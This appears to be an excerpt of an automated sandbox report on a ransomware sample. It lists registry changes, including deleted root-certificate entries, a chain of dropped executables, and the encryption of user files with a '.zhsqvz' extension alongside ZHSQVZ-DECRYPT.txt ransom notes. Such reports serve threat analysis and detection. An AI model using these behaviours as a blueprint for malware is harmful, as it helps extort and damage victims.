8D4A170BE8C24AC6B9275663A3C4F4E2023D6F7C3FAF1DFB7E7EA7F08ACB1354493B94D450B345B6626A381ACDDC06BC1465C87A4C6C0F0EA8BA1B4D67A1AB4DB3D434A6D53B5D47E06E0F52DD3969DCE9155320C8ACFDC36E88789FC93320F6515E7C4FFF29CAFDA3604563ABBB49FEBB5B7CC119B1DAA1F86351B326D98496B6602F848218B3050AD31CA37CD822AACB275426DF10C1E0534E1739FF897267F73E7DF79C5A4617E0A5ACAD14101147B3C8F222A05D507C1B059F73312348D136A04001A20DB30E5CD51D9E9E310EF7BFBB7C4C87D43471B0ACB035DA77B1C493000BD30D0ED1F484236D987D2CA48EE8FBEE6F24F1BF1A5355D5C43C41422110AA7EF27C4FA15A174C4F556657349C533738D61FB72998CFE24E6B78FAE024385288494595BD5DC78D79B0A672D934C1BEA5A82AB0F43B8EB0FA9104AEBA3CEE13F4CAA5F2C4676CFC8D280D70F6E33B01C1B30978C5C6C48E424E728DDFBA42AEBC7CE7A999C3FF07DC111756670B7807FAC5E8C1CDF9AF6B5CB450E246CF53CA6D042DAD959378058110DA0111A285ECB5FDC3D3739356CC05F1E4B33C3B6BCE56442B5253879BBECBFC4333FB05D056E68D9FF5BA7C94734C95B3C1DC9389B1107AD5251A6C5213B2F712376BDC74D98B9DDC055820435276BBF8E7566E6C6C0C263CA0509F862CE370AD4D4EF4454D47E6B8B814671A270E23D67EDA93234BD2EC5C9E4E91CFBBB55904FE2A821DCDF7B7E8F696A6FDE0348C1EDDA2557BD2CFABA58D66968A8E8F99F46D00B6966CB3BCA90DFA447A50203015C39558F08982FC58EABD3C3
2180
3468116065.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
UNCAsIntranet
0
2180
3468116065.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
AutoDetect
1
2180
3468116065.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\3468116065_RASAPI32
EnableFileTracing
0
2180
3468116065.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\3468116065_RASAPI32
EnableConsoleTracing
0
2180
3468116065.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\3468116065_RASAPI32
FileTracingMask
4294901760
2180
3468116065.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\3468116065_RASAPI32
ConsoleTracingMask
4294901760
2180
3468116065.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\3468116065_RASAPI32
MaxFileSize
1048576
2180
3468116065.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\3468116065_RASAPI32
FileDirectory
%windir%\tracing
2180
3468116065.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\3468116065_RASMANCS
EnableFileTracing
0
2180
3468116065.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\3468116065_RASMANCS
EnableConsoleTracing
0
2180
3468116065.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\3468116065_RASMANCS
FileTracingMask
4294901760
2180
3468116065.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\3468116065_RASMANCS
ConsoleTracingMask
4294901760
2180
3468116065.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\3468116065_RASMANCS
MaxFileSize
1048576
2180
3468116065.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\3468116065_RASMANCS
FileDirectory
%windir%\tracing
2180
3468116065.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings
ProxyEnable
0
2180
3468116065.exe
write
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
SavedLegacySettings
460000006B000000010000000000000000000000000000000000000000000000C0E333BBEAB1D301000000000000000000000000020000001700000000000000FE800000000000007D6CB050D9C573F70B000000000000006D00330032005C004D00530049004D004700330032002E0064006C000100000004AA400014AA4000040000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002000000C0A8016400000000000000000000000000000000000000000800000000000000805D3F00983740000008000002000000000000600000002060040000B8A94000020000008802000060040000B8A9400004000000F8010000B284000088B64000B84B400043003A000000000000000000000000000000000000000000
2180
3468116065.exe
write
HKEY_CLASSES_ROOT\Local Settings\MuiCache\5F\52C64B7E
LanguageList
en-US
2180
3468116065.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13
Blob
040000000100000010000000410352DC0FF7501B16F0028EBA6F45C50F00000001000000140000005BCAA1C2780F0BCB5A90770451D96F38963F012D090000000100000042000000304006082B0601050507030406082B0601050507030106082B0601050507030206082B06010505070308060A2B0601040182370A0304060A2B0601040182370A030C6200000001000000200000000687260331A72403D909F105E69BCF0D32E1BD2493FFC6D9206D11BCD67707390B000000010000001E000000440053005400200052006F006F0074002000430041002000580033000000140000000100000014000000C4A7B1A47B2C71FADBE14B9075FFC415608589101D00000001000000100000004558D512EECB27464920897DE7B66053030000000100000014000000DAC9024F54D8F6DF94935FB1732638CA6AD77C131900000001000000100000006CF252FEC3E8F20996DE5D4DD9AEF42420000000010000004E0300003082034A30820232A003020102021044AFB080D6A327BA893039862EF8406B300D06092A864886F70D0101050500303F31243022060355040A131B4469676974616C205369676E617475726520547275737420436F2E311730150603550403130E44535420526F6F74204341205833301E170D3030303933303231313231395A170D3231303933303134303131355A303F31243022060355040A131B4469676974616C205369676E617475726520547275737420436F2E311730150603550403130E44535420526F6F7420434120583330820122300D06092A864886F70D01010105000382010F003082010A0282010100DFAFE99750088357B4CC6265F69082ECC7D32C6B30CA5BECD9C37DC740C118148BE0E83376492AE33F214993AC4E0EAF3E48CB65EEFCD3210F65D22AD9328F8CE5F777B0127BB595C089A3A9BAED732E7A0C063283A27E8A1430CD11A0E12A38B9790A31FD50BD8065DFB7516383C8E28861EA4B6181EC526BB9A2E24B1A289F48A39E0CDA098E3E172E1EDD20DF5BC62A8AAB2EBD70ADC50B1A25907472C57B6AAB34D63089FFE568137B540BC8D6AEEC5A9C921E3D64B38CC6DFBFC94170EC1672D526EC38553943D0FCFD185C40F197EBD59A9B8D1DBADA25B9C6D8DFC115023AABDA6EF13E2EF55C089C3CD68369E4109B192AB62957E3E53D9B9FF0025D0203010001A3423040300F0603551D130101FF040530030101FF300E0603551D0F0101FF040403020106301D0603551D0E04160414C4A7B1A47B2C71FADBE14B9075FFC41560858910300D06092A864886F70D01010505000382010100A31A2C9B17005CA91EEE2866373ABF83C73F4BC309A095205DE3D95944D23E0D3EBD8A4BA0741FCE10829C741A1D7E981ADDCB134BB32044E491E9CCFC7DA5DB6AE5FEE6FDE04EDDB7003AB57049AFF2E5EB02F1D1028B19CB943A5E48C4181E58195F1E025AF00CF1B1ADA9DC59868B6EE991F586CAFAB96633AA595BCEE2A7167347CB2BCC99B03748CFE3564BF5CF0F0C723287C6F044BB53726D43F526489A5267B758ABFE67767178DB0DA256141339243185A2A8025A3047E1DD5007BC02099000EB6463609B16BC88C912E6D27D918BF93D328D65B4E97CB15776EAC5B62839BF15651CC8F677966A0A8D770BD8910B048E07DB29B60AEE9D82353510
2180
3468116065.exe
delete key
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13
2180
3468116065.exe
write
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD
Blob
040000000100000010000000C5DFB849CA051355EE2DBA1AC33EB0280F00000001000000200000005229BA15B31B0C6F4CCA89C2985177974327D1B689A3B935A0BD975532AF22AB090000000100000054000000305206082B0601050507030106082B0601050507030206082B0601050507030306082B0601050507030406082B06010505070308060A2B0601040182370A030406082B0601050507030606082B060105050703070B000000010000003000000047006C006F00620061006C005300690067006E00200052006F006F00740020004300410020002D0020005200330000005300000001000000230000003021301F06092B06010401A032010130123010060A2B0601040182373C0101030200C0620000000100000020000000CBB522D7B7F127AD6A0113865BDF1CD4102E7D0759AF635A7CF4720DC963C53B1400000001000000140000008FF04B7FA82E4524AE4D50FA639A8BDEE2DD1BBC1D000000010000001000000001728E1ECF7A9D86FB3CEC8948ABA953030000000100000014000000D69B561148F01C77C54578C10926DF5B856976AD190000000100000010000000D0FD3C9C380D7B65E26B9A3FEDD39B8F2000000001000000630300003082035F30820247A003020102020B04000000000121585308A2300D06092A864886F70D01010B0500304C3120301E060355040B1317476C6F62616C5369676E20526F6F74204341202D20523331133011060355040A130A476C6F62616C5369676E311330110603550403130A476C6F62616C5369676E301E170D3039303331383130303030305A170D3239303331383130303030305A304C3120301E060355040B1317476C6F62616C5369676E20526F6F74204341202D20523331133011060355040A130A476C6F62616C5369676E311330110603550403130A476C6F62616C5369676E30820122300D06092A864886F70D01010105000382010F003082010A0282010100CC2576907906782216F5C083B684CA289EFD057611C5AD8872FC460243C7B28A9D045F24CB2E4BE1608246E152AB0C8147706CDD64D1EBF52CA30F823D0C2BAE97D7B614861079BB3B1380778C08E149D26A622F1F5EFA9668DF892795389F06D73EC9CB26590D73DEB0C8E9260E8315C6EF5B8BD20460CA49A628F6693BF6CBC82891E59D8A615737AC7414DC74E03AEE722F2E9CFBD0BBBFF53D00E10633E8822BAE53A63A16738CDD410E203AC0B4A7A1E9B24F902E3260E957CBB904926868E538266075B29F77FF9114EFAE2049FCAD401548D1023161195EB897EFAD77B7649A7ABF5FC113EF9B62FB0D6CE0546916A903DA6EE983937176C6698582170203010001A3423040300E0603551D0F0101FF040403020106300F0603551D130101FF040530030101FF301D0603551D0E041604148FF04B7FA82E4524AE4D50FA639A8BDEE2DD1BBC300D06092A864886F70D01010B050003820101004B40DBC050AAFEC80CEFF796544549BB96000941ACB3138686280733CA6BE674B9BA002DAEA40AD3F5F1F10F8ABF73674A83C7447B78E0AF6E6C6F03298E333945C38EE4B9576CAAFC1296EC53C62DE4246CB99463FBDC536867563E83B8CF3521C3C968FECEDAC253AACC908AE9F05D468C95DD7A58281A2F1DDECD0037418FED446DD75328977EF367041E15D78A96B4D3DE4C27A44C1B737376F41799C21F7A0EE32D08AD0A1C2CFF3CAB550E0F917E36EBC35749BEE12E2D7C608BC3415113239DCEF7326B9401A899E72C331F3A3B25D28640CE3B2C8678C9612F14BAEEDB556FDF84EE05094DBD28D872CED36250651EEB92978331D9B3B5CA47583F5F
2180
3468116065.exe
delete key
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD

Files activity

Executable files
14
Suspicious files
280
Text files
210
Unknown types
8

Dropped files

PID Process Filename Type
3784 powershell.exe C:\Users\admin\AppData\Local\Temp\979574639568794.exe executable
2928 winsvcs.exe C:\Users\admin\AppData\Local\Temp\1958842343.exe executable
3736 2746537711.exe C:\Users\admin\657607470096780\winsvcs.exe executable
2648 winsvcs.exe C:\Users\admin\AppData\Local\Temp\3875839546.exe executable
2648 winsvcs.exe C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\0UU90R59\2[1].exe executable
2648 winsvcs.exe C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\R9ZEWH8D\1[2].exe executable
2648 winsvcs.exe C:\Users\admin\AppData\Local\Temp\2746537711.exe executable
2928 winsvcs.exe C:\Users\admin\AppData\Local\Temp\3088011411.exe executable
3844 979574639568794.exe C:\Users\admin\495030305060\winsvcs.exe executable
2648 winsvcs.exe C:\Users\admin\AppData\Local\Temp\3358028963.exe executable
2648 winsvcs.exe C:\Users\admin\AppData\Local\Temp\3468116065.exe executable
3676 3875839546.exe C:\Users\admin\4950606094303050\wincfg32svc.exe executable
2648 winsvcs.exe C:\Users\admin\AppData\Local\Temp\3782739527.exe executable
2648 winsvcs.exe C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\R9ZEWH8D\1[1].exe executable
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Mozilla\Firefox\Profiles\qldyz51w.default\storage\default\about+newtab\.metadata-v2.zhsqvz binary
2180 3468116065.exe C:\Users\Public\Pictures\Sample Pictures\Lighthouse.jpg.zhsqvz binary
2180 3468116065.exe C:\Users\Public\Pictures\Sample Pictures\Lighthouse.jpg ––
2180 3468116065.exe C:\Users\Public\Pictures\Sample Pictures\Koala.jpg.zhsqvz binary
2180 3468116065.exe C:\Users\Public\Pictures\Sample Pictures\Koala.jpg ––
2180 3468116065.exe C:\Users\Public\Pictures\Sample Pictures\Jellyfish.jpg.zhsqvz binary
2180 3468116065.exe C:\Users\Public\Pictures\Sample Pictures\Jellyfish.jpg ––
2180 3468116065.exe C:\Users\Public\Pictures\Sample Pictures\Hydrangeas.jpg.zhsqvz binary
2180 3468116065.exe C:\Users\Public\Pictures\Sample Pictures\Hydrangeas.jpg ––
2180 3468116065.exe C:\Users\Public\Pictures\Sample Pictures\Desert.jpg.zhsqvz binary
2180 3468116065.exe C:\Users\Public\Pictures\Sample Pictures\Desert.jpg ––
2180 3468116065.exe C:\Users\Public\Pictures\Sample Pictures\Chrysanthemum.jpg.zhsqvz binary
2180 3468116065.exe C:\Users\Public\Pictures\Sample Pictures\Chrysanthemum.jpg ––
2180 3468116065.exe C:\Users\Public\Pictures\Sample Pictures\ZHSQVZ-DECRYPT.txt text
2180 3468116065.exe C:\Users\Public\Music\Sample Music\Sleep Away.mp3.zhsqvz ––
2180 3468116065.exe C:\Users\Public\Music\Sample Music\Sleep Away.mp3 ––
2180 3468116065.exe C:\Users\Public\Music\Sample Music\Maid with the Flaxen Hair.mp3.zhsqvz binary
2180 3468116065.exe C:\Users\Public\Music\Sample Music\Maid with the Flaxen Hair.mp3 ––
2180 3468116065.exe C:\Users\Public\Music\Sample Music\Kalimba.mp3.zhsqvz ––
2180 3468116065.exe C:\Users\Public\Music\Sample Music\Kalimba.mp3 ––
2180 3468116065.exe C:\Users\Public\Libraries\RecordedTV.library-ms.zhsqvz binary
2180 3468116065.exe C:\Users\Public\Music\Sample Music\ZHSQVZ-DECRYPT.txt text
2180 3468116065.exe C:\Users\Public\Libraries\RecordedTV.library-ms ––
2180 3468116065.exe C:\Users\Public\Libraries\ZHSQVZ-DECRYPT.txt text
2180 3468116065.exe C:\Users\Public\Music\ZHSQVZ-DECRYPT.txt text
2180 3468116065.exe C:\Users\Public\Pictures\ZHSQVZ-DECRYPT.txt text
2180 3468116065.exe C:\Users\Public\Videos\ZHSQVZ-DECRYPT.txt text
2180 3468116065.exe C:\Users\Public\Downloads\ZHSQVZ-DECRYPT.txt text
2180 3468116065.exe C:\Users\Public\Favorites\ZHSQVZ-DECRYPT.txt text
2180 3468116065.exe C:\Users\Public\Documents\ZHSQVZ-DECRYPT.txt text
2180 3468116065.exe C:\Users\Public\ZHSQVZ-DECRYPT.txt text
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Microsoft\Windows\Start Menu\ZHSQVZ-DECRYPT.txt text
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Microsoft\Windows\Templates\ZHSQVZ-DECRYPT.txt text
2180 3468116065.exe C:\Users\admin\Searches\Microsoft Outlook.searchconnector-ms.zhsqvz binary
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Microsoft\Windows\SendTo\ZHSQVZ-DECRYPT.txt text
2180 3468116065.exe C:\Users\admin\Searches\Microsoft Outlook.searchconnector-ms ––
2180 3468116065.exe C:\Users\admin\Searches\Microsoft OneNote.searchconnector-ms.zhsqvz binary
2180 3468116065.exe C:\Users\admin\Searches\Microsoft OneNote.searchconnector-ms ––
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\ZHSQVZ-DECRYPT.txt text
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\ZHSQVZ-DECRYPT.txt text
2180 3468116065.exe C:\Users\admin\Pictures\senseshot.jpg.zhsqvz binary
2180 3468116065.exe C:\Users\admin\Searches\ZHSQVZ-DECRYPT.txt text
2180 3468116065.exe C:\Users\admin\Saved Games\ZHSQVZ-DECRYPT.txt text
2180 3468116065.exe C:\Users\admin\Pictures\senseshot.jpg ––
2180 3468116065.exe C:\Users\admin\Pictures\programsmarch.jpg.zhsqvz binary
2180 3468116065.exe C:\Users\admin\Pictures\mountainpresented.jpg.zhsqvz binary
2180 3468116065.exe C:\Users\admin\Pictures\programsmarch.jpg ––
2180 3468116065.exe C:\Users\admin\Pictures\mountainpresented.jpg ––
2180 3468116065.exe C:\Users\admin\Pictures\farupon.png.zhsqvz binary
2180 3468116065.exe C:\Users\admin\Pictures\healththroughout.jpg.zhsqvz binary
2180 3468116065.exe C:\Users\admin\Pictures\farupon.png ––
2180 3468116065.exe C:\Users\admin\Pictures\healththroughout.jpg ––
2180 3468116065.exe C:\Users\admin\ntuser.ini.zhsqvz binary
2180 3468116065.exe C:\Users\admin\Pictures\everyoneebay.jpg.zhsqvz fli
2180 3468116065.exe C:\Users\admin\ntuser.ini ––
2180 3468116065.exe C:\Users\admin\Pictures\everyoneebay.jpg ––
2180 3468116065.exe C:\Users\admin\Favorites\Windows Live\Windows Live Mail.url.zhsqvz bs
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Microsoft\Windows\Network Shortcuts\ZHSQVZ-DECRYPT.txt text
2180 3468116065.exe C:\Users\admin\Links\ZHSQVZ-DECRYPT.txt text
2180 3468116065.exe C:\Users\admin\Favorites\Windows Live\Windows Live Spaces.url.zhsqvz binary
2180 3468116065.exe C:\Users\admin\Favorites\Windows Live\Windows Live Spaces.url ––
2180 3468116065.exe C:\Users\admin\Favorites\Windows Live\Windows Live Gallery.url.zhsqvz binary
2180 3468116065.exe C:\Users\admin\Favorites\Windows Live\Get Windows Live.url.zhsqvz binary
2180 3468116065.exe C:\Users\admin\Favorites\MSN Websites\MSNBC News.url.zhsqvz binary
2180 3468116065.exe C:\Users\admin\Favorites\Windows Live\ZHSQVZ-DECRYPT.txt text
2180 3468116065.exe C:\Users\admin\Favorites\Windows Live\Windows Live Gallery.url ––
2180 3468116065.exe C:\Users\admin\Favorites\Windows Live\Windows Live Mail.url ––
2180 3468116065.exe C:\Users\admin\Favorites\Windows Live\Get Windows Live.url ––
2180 3468116065.exe C:\Users\admin\Favorites\MSN Websites\MSN Sports.url.zhsqvz binary
2180 3468116065.exe C:\Users\admin\Favorites\MSN Websites\MSN.url.zhsqvz binary
2180 3468116065.exe C:\Users\admin\Favorites\MSN Websites\MSN Sports.url ––
2180 3468116065.exe C:\Users\admin\Favorites\MSN Websites\MSNBC News.url ––
2180 3468116065.exe C:\Users\admin\Favorites\MSN Websites\MSN.url ––
2180 3468116065.exe C:\Users\admin\Favorites\MSN Websites\MSN Money.url.zhsqvz binary
2180 3468116065.exe C:\Users\admin\Favorites\MSN Websites\MSN Entertainment.url.zhsqvz binary
2180 3468116065.exe C:\Users\admin\Favorites\MSN Websites\ZHSQVZ-DECRYPT.txt text
2180 3468116065.exe C:\Users\admin\Favorites\MSN Websites\MSN Autos.url.zhsqvz binary
2180 3468116065.exe C:\Users\admin\Favorites\MSN Websites\MSN Autos.url ––
2180 3468116065.exe C:\Users\admin\Favorites\MSN Websites\MSN Money.url ––
2180 3468116065.exe C:\Users\admin\Favorites\MSN Websites\MSN Entertainment.url ––
2180 3468116065.exe C:\Users\admin\Favorites\Microsoft Websites\Microsoft Store.url.zhsqvz binary
2180 3468116065.exe C:\Users\admin\Favorites\Microsoft Websites\Microsoft At Home.url.zhsqvz binary
2180 3468116065.exe C:\Users\admin\Favorites\Microsoft Websites\Microsoft At Work.url.zhsqvz binary
2180 3468116065.exe C:\Users\admin\Favorites\Microsoft Websites\Microsoft Store.url ––
2180 3468116065.exe C:\Users\admin\Favorites\Microsoft Websites\Microsoft At Work.url ––
2180 3468116065.exe C:\Users\admin\Favorites\Microsoft Websites\Microsoft At Home.url ––
2180 3468116065.exe C:\Users\admin\Favorites\Microsoft Websites\ZHSQVZ-DECRYPT.txt text
2180 3468116065.exe C:\Users\admin\Favorites\Microsoft Websites\IE site on Microsoft.com.url.zhsqvz binary
2180 3468116065.exe C:\Users\admin\Favorites\Microsoft Websites\IE Add-on site.url.zhsqvz binary
2180 3468116065.exe C:\Users\admin\Favorites\Microsoft Websites\IE site on Microsoft.com.url ––
2180 3468116065.exe C:\Users\admin\Favorites\Microsoft Websites\IE Add-on site.url ––
2180 3468116065.exe C:\Users\admin\Favorites\Links for United States\ZHSQVZ-DECRYPT.txt text
2180 3468116065.exe C:\Users\admin\Favorites\Links for United States\USA.gov.url.zhsqvz binary
2180 3468116065.exe C:\Users\admin\Favorites\Links for United States\GobiernoUSA.gov.url.zhsqvz binary
2180 3468116065.exe C:\Users\admin\Favorites\Links\Web Slice Gallery.url.zhsqvz binary
2180 3468116065.exe C:\Users\admin\Favorites\Links for United States\USA.gov.url ––
2180 3468116065.exe C:\Users\admin\Favorites\Links\Web Slice Gallery.url ––
2180 3468116065.exe C:\Users\admin\Favorites\Links for United States\GobiernoUSA.gov.url ––
2180 3468116065.exe C:\Users\admin\Favorites\Links\Suggested Sites.url.zhsqvz binary
2180 3468116065.exe C:\Users\admin\Favorites\Links\Suggested Sites.url ––
2180 3468116065.exe C:\Users\admin\Favorites\ZHSQVZ-DECRYPT.txt text
2180 3468116065.exe C:\Users\admin\Downloads\tvcomputers.jpg.zhsqvz binary
2180 3468116065.exe C:\Users\admin\Favorites\Links\ZHSQVZ-DECRYPT.txt text
2180 3468116065.exe C:\Users\admin\Downloads\tvcomputers.jpg ––
2180 3468116065.exe C:\Users\admin\Downloads\nudedecember.jpg.zhsqvz binary
2180 3468116065.exe C:\Users\admin\Downloads\paypalbenefit.png.zhsqvz binary
2180 3468116065.exe C:\Users\admin\Downloads\nudedecember.jpg ––
2180 3468116065.exe C:\Users\admin\Downloads\paypalbenefit.png ––
2180 3468116065.exe C:\Users\admin\Downloads\mapsoperating.png.zhsqvz binary
2180 3468116065.exe C:\Users\admin\Downloads\hereglobal.jpg.zhsqvz binary
2180 3468116065.exe C:\Users\admin\Downloads\hereglobal.jpg ––
2180 3468116065.exe C:\Users\admin\Downloads\mapsoperating.png ––
2180 3468116065.exe C:\Users\admin\Documents\weatherhardcore.rtf.zhsqvz binary
2180 3468116065.exe C:\Users\admin\Documents\xgreater.rtf.zhsqvz binary
2180 3468116065.exe C:\Users\admin\Downloads\ZHSQVZ-DECRYPT.txt text
2180 3468116065.exe C:\Users\admin\Documents\weatherhardcore.rtf ––
2180 3468116065.exe C:\Users\admin\Documents\xgreater.rtf ––
2180 3468116065.exe C:\Users\admin\Documents\tuesdaytue.rtf.zhsqvz binary
2180 3468116065.exe C:\Users\admin\Documents\Outlook Files\Outlook.pst.zhsqvz binary
2180 3468116065.exe C:\Users\admin\Documents\Outlook Files\~Outlook.pst.tmp.zhsqvz vc
2180 3468116065.exe C:\Users\admin\Documents\tuesdaytue.rtf ––
2180 3468116065.exe C:\Users\admin\Documents\Outlook Files\Outlook.pst ––
2180 3468116065.exe C:\Users\admin\Documents\Outlook Files\~Outlook.pst.tmp ––
2180 3468116065.exe C:\Users\admin\Documents\Outlook Files\Outlook Data File - NoMail.pst.zhsqvz binary
2180 3468116065.exe C:\Users\admin\Documents\Outlook Files\Outlook Data File - test.pst.zhsqvz binary
2180 3468116065.exe C:\Users\admin\Documents\Outlook Files\Outlook Data File - NoMail.pst ––
2180 3468116065.exe C:\Users\admin\Documents\Outlook Files\Outlook Data File - test.pst ––
2180 3468116065.exe C:\Users\admin\Documents\OneNote Notebooks\Personal\Unfiled Notes.one.zhsqvz binary
2180 3468116065.exe C:\Users\admin\Documents\Outlook Files\honey@pot.com.pst.zhsqvz binary
2180 3468116065.exe C:\Users\admin\Documents\Outlook Files\ZHSQVZ-DECRYPT.txt text
2180 3468116065.exe C:\Users\admin\Documents\OneNote Notebooks\Personal\Open Notebook.onetoc2.zhsqvz binary
2180 3468116065.exe C:\Users\admin\Documents\Outlook Files\honey@pot.com.pst ––
2180 3468116065.exe C:\Users\admin\Documents\OneNote Notebooks\Personal\Open Notebook.onetoc2 ––
2180 3468116065.exe C:\Users\admin\Documents\OneNote Notebooks\Personal\Unfiled Notes.one ––
2180 3468116065.exe C:\Users\admin\Documents\OneNote Notebooks\Personal\General.one.zhsqvz binary
2180 3468116065.exe C:\Users\admin\Documents\OneNote Notebooks\Personal\General.one ––
2180 3468116065.exe C:\Users\admin\Documents\iephone.rtf.zhsqvz binary
2180 3468116065.exe C:\Users\admin\Documents\OneNote Notebooks\Personal\ZHSQVZ-DECRYPT.txt text
2180 3468116065.exe C:\Users\admin\Videos\ZHSQVZ-DECRYPT.txt text
2180 3468116065.exe C:\Users\admin\Music\ZHSQVZ-DECRYPT.txt text
2180 3468116065.exe C:\Users\admin\Pictures\ZHSQVZ-DECRYPT.txt text
2180 3468116065.exe C:\Users\admin\Documents\OneNote Notebooks\ZHSQVZ-DECRYPT.txt text
2180 3468116065.exe C:\Users\admin\Documents\iephone.rtf ––
2180 3468116065.exe C:\Users\admin\Documents\employeesupon.rtf.zhsqvz binary
2180 3468116065.exe C:\Users\admin\Documents\estwhile.rtf.zhsqvz binary
2180 3468116065.exe C:\Users\admin\Documents\estwhile.rtf ––
2180 3468116065.exe C:\Users\admin\Documents\employeesupon.rtf ––
2180 3468116065.exe C:\Users\admin\Documents\beensouth.rtf.zhsqvz binary
2180 3468116065.exe C:\Users\admin\Documents\beensouth.rtf ––
2180 3468116065.exe C:\Users\admin\Documents\ZHSQVZ-DECRYPT.txt text
2180 3468116065.exe C:\Users\admin\Desktop\stocktoday.png.zhsqvz binary
2180 3468116065.exe C:\Users\admin\Desktop\stocktoday.png ––
2180 3468116065.exe C:\Users\admin\Desktop\providesupplies.png.zhsqvz binary
2180 3468116065.exe C:\Users\admin\Desktop\providesupplies.png ––
2180 3468116065.exe C:\Users\admin\Desktop\modelmonday.rtf.zhsqvz binary
2180 3468116065.exe C:\Users\admin\Desktop\modelmonday.rtf ––
2180 3468116065.exe C:\Users\admin\Desktop\menhp.png.zhsqvz binary
2180 3468116065.exe C:\Users\admin\Desktop\menhp.png ––
2180 3468116065.exe C:\Users\admin\Desktop\leadingspecific.rtf.zhsqvz binary
2180 3468116065.exe C:\Users\admin\Desktop\Love_You_2019_33235120-txt.js.zhsqvz binary
2180 3468116065.exe C:\Users\admin\Desktop\leadingspecific.rtf ––
2180 3468116065.exe C:\Users\admin\Desktop\Love_You_2019_33235120-txt.js ––
2180 3468116065.exe C:\Users\admin\Desktop\allsimple.rtf.zhsqvz binary
2180 3468116065.exe C:\Users\admin\Desktop\coloradoproperty.rtf.zhsqvz binary
2180 3468116065.exe C:\Users\admin\Desktop\coloradoproperty.rtf ––
2180 3468116065.exe C:\Users\admin\Desktop\allsimple.rtf ––
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\ZHSQVZ-DECRYPT.txt text
2180 3468116065.exe C:\Users\admin\Desktop\albumturn.rtf.zhsqvz binary
2180 3468116065.exe C:\Users\admin\Desktop\ZHSQVZ-DECRYPT.txt text
2180 3468116065.exe C:\Users\admin\Contacts\admin.contact.zhsqvz binary
2180 3468116065.exe C:\Users\admin\Desktop\albumturn.rtf ––
2180 3468116065.exe C:\Users\admin\Contacts\admin.contact ––
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Microsoft\Windows\Cookies\admin@www.pizcam[1].txt text
2180 3468116065.exe C:\Users\admin\AppData\Roaming\WinRAR\version.dat.zhsqvz binary
2180 3468116065.exe C:\Users\admin\Contacts\ZHSQVZ-DECRYPT.txt text
2180 3468116065.exe C:\Users\admin\AppData\Roaming\WinRAR\version.dat ––
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Skype\SkypeRT\ul.conf.zhsqvz binary
2180 3468116065.exe C:\Users\admin\AppData\Roaming\WinRAR\ZHSQVZ-DECRYPT.txt text
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Sun\ZHSQVZ-DECRYPT.txt text
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Sun\Java\ZHSQVZ-DECRYPT.txt text
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Sun\Java\Deployment\ZHSQVZ-DECRYPT.txt text
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Skype\SkypeRT\ul.conf ––
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Skype\SkypeRT\skypert.conf.zhsqvz binary
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Skype\SkypeRT\ZHSQVZ-DECRYPT.txt text
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Skype\SkypeRT\ecs.conf.zhsqvz binary
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Skype\SkypeRT\ecs.conf ––
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Skype\SkypeRT\skypert.conf ––
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Skype\shared_httpfe\queue.db.zhsqvz binary
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Skype\shared_httpfe\queue.db ––
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Skype\shared_httpfe\ZHSQVZ-DECRYPT.txt text
2180 3468116065.exe C:\Users\admin\AppData\Roaming\Skype\shared_dynco\dc.db-journal.zhsqvz binary
